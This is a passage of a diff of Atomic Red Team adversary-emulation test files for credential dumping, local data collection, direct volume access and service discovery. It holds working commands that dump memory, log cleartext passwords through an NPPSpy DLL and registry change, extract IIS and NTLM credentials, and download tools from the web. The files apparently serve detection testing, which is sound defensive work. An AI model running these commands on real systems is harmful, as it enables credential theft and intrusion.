Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
[Source](https://attack.mitre.org/techniques/T1003)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Gsecdump](#atomic-test-1-gsecdump)
- [Atomic Test #2: Credential Dumping with NPPSpy](#atomic-test-2-credential-dumping-with-nppspy)
- [Atomic Test #3: Dump svchost.exe to gather RDP credentials](#atomic-test-3-dump-svchostexe-to-gather-rdp-credentials)
- [Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)](#atomic-test-4-retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-list)
- [Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)](#atomic-test-5-retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-config)
- [Atomic Test #6: Dump Credential Manager using keymgr.dll and rundll32.exe](#atomic-test-6-dump-credential-manager-using-keymgrdll-and-rundll32exe)
- [Atomic Test #7: Send NTLM Hash with RPC Test Connection](#atomic-test-7-send-ntlm-hash-with-rpc-test-connection)
- [Atomic Test #1 - Gsecdump](#atomic-test-1---gsecdump)
### Atomic Test #1: Gsecdump
- [Atomic Test #2 - Credential Dumping with NPPSpy](#atomic-test-2---credential-dumping-with-nppspy)
- [Atomic Test #3 - Dump svchost.exe to gather RDP credentials](#atomic-test-3---dump-svchostexe-to-gather-rdp-credentials)
- [Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)](#atomic-test-4---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-list)
- [Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)](#atomic-test-5---retrieve-microsoft-iis-service-account-credentials-using-appcmd-using-config)
- [Atomic Test #6 - Dump Credential Manager using keymgr.dll and rundll32.exe](#atomic-test-6---dump-credential-manager-using-keymgrdll-and-rundll32exe)
- [Atomic Test #7 - Send NTLM Hash with RPC Test Connection](#atomic-test-7---send-ntlm-hash-with-rpc-test-connection)
<br/>
## Atomic Test #1 - Gsecdump
Dump credentials from memory using Gsecdump.
Upon successful execution, you should see domain\username's followed by two 32 character hashes.
@@ -31,35 +40,38 @@ If you see a message saying "The system cannot find the path specified", try usi
**Supported Platforms:** Windows
**auto_generated_guid:** `96345bfc-8ae7-4b6a-80b7-223200f24ef9`
#### Inputs
**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gsecdump_exe | Path to the Gsecdump executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;gsecdump.exe|
| gsecdump_bin_hash | File hash of the Gsecdump binary file | string | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
| gsecdump_url | Path to download Gsecdump binary file | url | https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{gsecdump_exe}" -a
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{gsecdump_exe}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
@@ -69,8 +81,13 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
}
```
### Atomic Test #2: Credential Dumping with NPPSpy
<br/>
<br/>
## Atomic Test #2 - Credential Dumping with NPPSpy
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.
After user's logging in cleartext password is saved in C:\NPPSpy.txt.
Clean up deletes the files and reverses Registry changes.
@@ -78,9 +95,16 @@ NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NP
**Supported Platforms:** Windows
**auto_generated_guid:** `9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
@@ -95,8 +119,7 @@ $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\Netw
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
$cleanupPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER
@@ -107,26 +130,28 @@ Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: NPPSpy.dll must be available in ExternalPayloads directory
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll"
```
### Atomic Test #3: Dump svchost.exe to gather RDP credentials
<br/>
<br/>
## Atomic Test #3 - Dump svchost.exe to gather RDP credentials
The svchost.exe contains the RDP plain-text credentials.
Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
@@ -134,9 +159,16 @@ Upon successful execution, you should see the following file created $env:TEMP\s
**Supported Platforms:** Windows
**auto_generated_guid:** `d400090a-d8ca-4be0-982e-c70598a23de9`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** d400090a-d8ca-4be0-982e-c70598a23de9
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
@@ -144,21 +176,34 @@ if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
```
### Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
<br/>
<br/>
## Atomic Test #4 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
**Supported Platforms:** Windows
**auto_generated_guid:** `6c7a4fd3-5b0b-4b30-a93e-39411b25d889`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 6c7a4fd3-5b0b-4b30-a93e-39411b25d889
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
@@ -167,88 +212,125 @@ C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: IIS must be installed prior to running the test
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Install-WindowsFeature -name Web-Server -IncludeManagementTools
```
### Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
<br/>
<br/>
## Atomic Test #5 - Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes.
[Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
**Supported Platforms:** Windows
**auto_generated_guid:** `42510244-5019-48fa-a0e5-66c3b76e6049`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 42510244-5019-48fa-a0e5-66c3b76e6049
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: IIS must be installed prior to running the test
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Install-WindowsFeature -name Web-Server -IncludeManagementTools
```
### Atomic Test #6: Dump Credential Manager using keymgr.dll and rundll32.exe
<br/>
<br/>
## Atomic Test #6 - Dump Credential Manager using keymgr.dll and rundll32.exe
This test executes the exported function `KRShowKeyMgr` located in `keymgr.dll` using `rundll32.exe`. It opens a window that allows to export stored Windows credentials from the credential manager to a file (`.crd` by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieve multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.).
Reference: https://twitter.com/0gtweet/status/1415671356239216653
**Supported Platforms:** Windows
**auto_generated_guid:** `84113186-ed3c-4d0d-8a3c-8980c86c1f4a`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** 84113186-ed3c-4d0d-8a3c-8980c86c1f4a
#### Attack Commands: Run with `powershell`!
```powershell
rundll32.exe keymgr,KRShowKeyMgr
```
### Atomic Test #7: Send NTLM Hash with RPC Test Connection
<br/>
<br/>
## Atomic Test #7 - Send NTLM Hash with RPC Test Connection
RpcPing command can be used to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
Ref: https://twitter.com/vysecurity/status/974806438316072960
**Supported Platforms:** Windows
**auto_generated_guid:** `0b207037-813c-4444-ac3f-b597cf280a67`
#### Inputs
**auto_generated_guid:** 0b207037-813c-4444-ac3f-b597cf280a67
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| custom_port | Specify the custom port number | integer | 1234|
| server_ip | Specify the server IP address. If not specified, the loop back IP will be used | string | 127.0.0.1|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null
```
<br/>
atomics/T1005/T1005.md
+68 -33
View File
@@ -1,36 +1,47 @@
# T1005 - Data from Local System
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1005)
<blockquote>
## Description from ATT&CK
Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.
> Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.
>
> Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
[Source](https://attack.mitre.org/techniques/T1005)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Search files of interest and save them to a single zip file (Windows)](#atomic-test-1-search-files-of-interest-and-save-them-to-a-single-zip-file-windows)
- [Atomic Test #2: Find and dump sqlite databases (Linux)](#atomic-test-2-find-and-dump-sqlite-databases-linux)
- [Atomic Test #3: Copy Apple Notes database files using AppleScript](#atomic-test-3-copy-apple-notes-database-files-using-applescript)
- [Atomic Test #1 - Search files of interest and save them to a single zip file (Windows)](#atomic-test-1---search-files-of-interest-and-save-them-to-a-single-zip-file-windows)
### Atomic Test #1: Search files of interest and save them to a single zip file (Windows)
- [Atomic Test #2 - Find and dump sqlite databases (Linux)](#atomic-test-2---find-and-dump-sqlite-databases-linux)
- [Atomic Test #3 - Copy Apple Notes database files using AppleScript](#atomic-test-3---copy-apple-notes-database-files-using-applescript)
<br/>
## Atomic Test #1 - Search files of interest and save them to a single zip file (Windows)
This test searches for files of certain extensions and saves them to a single zip file prior to extraction.
**Supported Platforms:** Windows
**auto_generated_guid:** `d3d9af44-b8ad-4375-8b0a-4bff4b7e419c`
#### Inputs
**auto_generated_guid:** d3d9af44-b8ad-4375-8b0a-4bff4b7e419c
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| starting_directory | Path to starting directory for the search | Path | C:&#92;Users|
| output_zip_folder_path | Path to directory for saving the generated zip file | Path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;T1005|
| file_extensions | List of file extensions to be searched and zipped, separated by comma and space | string | .doc, .docx, .txt|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
$startingDirectory = "#{starting_directory}"
@@ -61,26 +72,38 @@ if ($foundFiles.Count -gt 0) {
}
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item -Path $outputZip\data.zip -Force
```
### Atomic Test #2: Find and dump sqlite databases (Linux)
<br/>
<br/>
## Atomic Test #2 - Find and dump sqlite databases (Linux)
An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
**Supported Platforms:** Linux
**auto_generated_guid:** `00cbb875-7ae4-4cf1-b638-e543fd825300`
#### Inputs
**auto_generated_guid:** 00cbb875-7ae4-4cf1-b638-e543fd825300
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | url of remote payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src|
#### Attack Commands: Run with `bash`!
#### Attack Commands: Run with `bash`!
```bash
cd $HOME
@@ -91,55 +114,67 @@ chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
```
#### Cleanup Commands
#### Cleanup Commands:
```bash
rm -f $HOME/.art
rm -f $HOME/gta.db
rm -f $HOME/sqlite_dump.sh
```
#### Dependencies: Run with `bash`!
#### Dependencies: Run with `bash`!
##### Description: Check if running on a Debian based machine.
###### Check Prereq Commands
##### Check Prereq Commands:
```bash
if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
```
###### Get Prereq Commands
##### Get Prereq Commands:
```bash
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi
```
### Atomic Test #3: Copy Apple Notes database files using AppleScript
<br/>
<br/>
## Atomic Test #3 - Copy Apple Notes database files using AppleScript
This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
**Supported Platforms:** macOS
**auto_generated_guid:** `cfb6d400-a269-4c06-a347-6d88d584d5f7`
#### Inputs
**auto_generated_guid:** cfb6d400-a269-4c06-a347-6d88d584d5f7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| destination_path | Specify the path to copy the database files into. | path | /private/tmp|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm "#{destination_path}/NoteStore.sqlite*"
```
<br/>
atomics/T1006/T1006.md
+24 -10
View File
@@ -1,19 +1,21 @@
# T1006 - Direct Volume Access
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1006)
<blockquote>
## Description from ATT&CK
Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
> Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
>
> Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)
Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)
[Source](https://attack.mitre.org/techniques/T1006)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Read volume boot sector via DOS device path (PowerShell)](#atomic-test-1-read-volume-boot-sector-via-dos-device-path-powershell)
- [Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell)](#atomic-test-1---read-volume-boot-sector-via-dos-device-path-powershell)
### Atomic Test #1: Read volume boot sector via DOS device path (PowerShell)
<br/>
## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell)
This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
On success, a hex dump of the first 11 bytes of the volume is displayed.
@@ -26,15 +28,21 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti
**Supported Platforms:** Windows
**auto_generated_guid:** `88f6327e-51ec-4bbf-b2e8-3fea534eab8b`
#### Inputs
**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| volume | Drive letter of the volume to access | string | C:|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$buffer = New-Object byte[] 11
@@ -44,3 +52,9 @@ $handle.Close()
Format-Hex -InputObject $buffer
```
<br/>
atomics/T1007/T1007.md
+78 -97
View File
@@ -1,167 +1,148 @@
# T1007 - System Service Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1007)
<blockquote>
## Description from ATT&CK
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS.(Citation: Elastic Security Labs GOSAR 2024)(Citation: SentinelLabs macOS Malware 2021)(Citation: Splunk Linux Gormir 2024)(Citation: Aquasec Kinsing 2020)
> Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS.(Citation: Elastic Security Labs GOSAR 2024)(Citation: SentinelLabs macOS Malware 2021)(Citation: Splunk Linux Gormir 2024)(Citation: Aquasec Kinsing 2020)
>
> Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
[Source](https://attack.mitre.org/techniques/T1007)
</blockquote>
## Atomic Tests
- [Atomic Test #1: System Service Discovery](#atomic-test-1-system-service-discovery)
- [Atomic Test #2: System Service Discovery - net.exe](#atomic-test-2-system-service-discovery---netexe)
- [Atomic Test #3: System Service Discovery - systemctl/service](#atomic-test-3-system-service-discovery---systemctlservice)
- [Atomic Test #4: Get-Service Execution](#atomic-test-4-get-service-execution)
- [Atomic Test #5: System Service Discovery - macOS launchctl](#atomic-test-5-system-service-discovery---macos-launchctl)
- [Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks)](#atomic-test-6-system-service-discovery---windows-scheduled-tasks-schtasks)
- [Atomic Test #7: System Service Discovery - Services Registry Enumeration](#atomic-test-7-system-service-discovery---services-registry-enumeration)
- [Atomic Test #8: System Service Discovery - Linux init scripts](#atomic-test-8-system-service-discovery---linux-init-scripts)
- [Atomic Test #1 - System Service Discovery](#atomic-test-1---system-service-discovery)
### Atomic Test #1: System Service Discovery
- [Atomic Test #2 - System Service Discovery - net.exe](#atomic-test-2---system-service-discovery---netexe)
- [Atomic Test #3 - System Service Discovery - systemctl/service](#atomic-test-3---system-service-discovery---systemctlservice)
- [Atomic Test #4 - Get-Service Execution](#atomic-test-4---get-service-execution)
<br/>
## Atomic Test #1 - System Service Discovery
Identify system services.
Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `89676ba1-b1f8-47ee-b940-2e1a113ebc71`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
tasklist.exe /svc
tasklist.exe
sc query
sc query state= all
```
### Atomic Test #2: System Service Discovery - net.exe
<br/>
<br/>
## Atomic Test #2 - System Service Discovery - net.exe
Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in in the temp directory called service-list.txt.
**Supported Platforms:** Windows
**auto_generated_guid:** `5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3`
#### Inputs
**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to hold net.exe output | path | %temp%&#92;service-list.txt|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
net.exe start >> #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del /f /q /s #{output_file} >nul 2>&1
```
### Atomic Test #3: System Service Discovery - systemctl/service
<br/>
<br/>
## Atomic Test #3 - System Service Discovery - systemctl/service
Enumerates system service using systemctl/service
**Supported Platforms:** Linux
**auto_generated_guid:** `f4b26bce-4c2c-46c0-bcc5-fce062d38bef`
#### Attack Commands: Run with `bash`!
**auto_generated_guid:** f4b26bce-4c2c-46c0-bcc5-fce062d38bef
#### Attack Commands: Run with `bash`!
```bash
if [ "$(uname)" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;
```
### Atomic Test #4: Get-Service Execution
<br/>
<br/>
## Atomic Test #4 - Get-Service Execution
Executes the Get-Service cmdlet to gather objects representing all services on the local system.
**Supported Platforms:** Windows
**auto_generated_guid:** `51f17016-d8fa-4360-888a-df4bf92c4a04`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 51f17016-d8fa-4360-888a-df4bf92c4a04
#### Attack Commands: Run with `command_prompt`!
```cmd
powershell.exe Get-Service
```
### Atomic Test #5: System Service Discovery - macOS launchctl
Enumerates services on macOS using launchctl. Used by adversaries for
identifying daemons, background services, and persistence mechanisms.
**Supported Platforms:** macOS
**auto_generated_guid:** `9b378962-a75e-4856-b117-2503d6dcebba`
#### Attack Commands: Run with `sh`!
```sh
launchctl list
```
### Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks)
Enumerates scheduled tasks on Windows using schtasks.exe.
**Supported Platforms:** Windows
**auto_generated_guid:** `7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a`
#### Attack Commands: Run with `command_prompt`!
```cmd
schtasks /query /fo LIST /v
```
### Atomic Test #7: System Service Discovery - Services Registry Enumeration
Enumerates Windows services by reading the Services registry key
(HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
Manager APIs or CLI tools such as sc.exe or Get-Service.
**Supported Platforms:** Windows
**auto_generated_guid:** `d70d82bd-bb00-4837-b146-b40d025551b2`
#### Attack Commands: Run with `powershell`!
```powershell
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
ForEach-Object {
$p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
[PSCustomObject]@{
Name = $_.PSChildName
DisplayName = $p.DisplayName
ImagePath = $p.ImagePath
StartType = $p.Start
}
}
```
### Atomic Test #8: System Service Discovery - Linux init scripts
Enumerates system services by listing SysV init scripts and runlevel
symlinks under /etc/init.d and /etc/rc*.d.
**Supported Platforms:** Linux
**auto_generated_guid:** `8f2a5d2b-4018-46d4-8f3f-0fea53754690`
#### Attack Commands: Run with `sh`!
```sh
echo "[*] Listing SysV init scripts (/etc/init.d):"
if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
echo
echo "[*] Listing runlevel directories (/etc/rc*.d):"
ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
```
<br/>
atomics/T1007/T1007.yaml
+1 -58
View File
@@ -11,7 +11,7 @@ atomic_tests:
- windows
executor:
command: |
tasklist.exe /svc
tasklist.exe
sc query
sc query state= all
name: command_prompt
@@ -53,60 +53,3 @@ atomic_tests:
executor:
name: command_prompt
command: powershell.exe Get-Service
- name: System Service Discovery - macOS launchctl
auto_generated_guid: 9b378962-a75e-4856-b117-2503d6dcebba
description: |
Enumerates services on macOS using launchctl. Used by adversaries for
identifying daemons, background services, and persistence mechanisms.
supported_platforms:
- macos
executor:
name: sh
command: launchctl list
- name: System Service Discovery - Windows Scheduled Tasks (schtasks)
auto_generated_guid: 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a
description: |
Enumerates scheduled tasks on Windows using schtasks.exe.
supported_platforms:
- windows
executor:
name: command_prompt
command: schtasks /query /fo LIST /v
- name: System Service Discovery - Services Registry Enumeration
auto_generated_guid: d70d82bd-bb00-4837-b146-b40d025551b2
description: |
Enumerates Windows services by reading the Services registry key
(HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
Manager APIs or CLI tools such as sc.exe or Get-Service.
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
ForEach-Object {
$p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
[PSCustomObject]@{
Name = $_.PSChildName
DisplayName = $p.DisplayName
ImagePath = $p.ImagePath
StartType = $p.Start
}
}
- name: System Service Discovery - Linux init scripts
auto_generated_guid: 8f2a5d2b-4018-46d4-8f3f-0fea53754690
description: |
Enumerates system services by listing SysV init scripts and runlevel
symlinks under /etc/init.d and /etc/rc*.d.
supported_platforms:
- linux
executor:
name: sh
command: |
echo "[*] Listing SysV init scripts (/etc/init.d):"
if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
echo
echo "[*] Listing runlevel directories (/etc/rc*.d):"
ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
atomics/T1010/T1010.md
+27 -19
View File
@@ -1,61 +1,69 @@
# T1010 - Application Window Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1010)
<blockquote>
## Description from ATT&CK
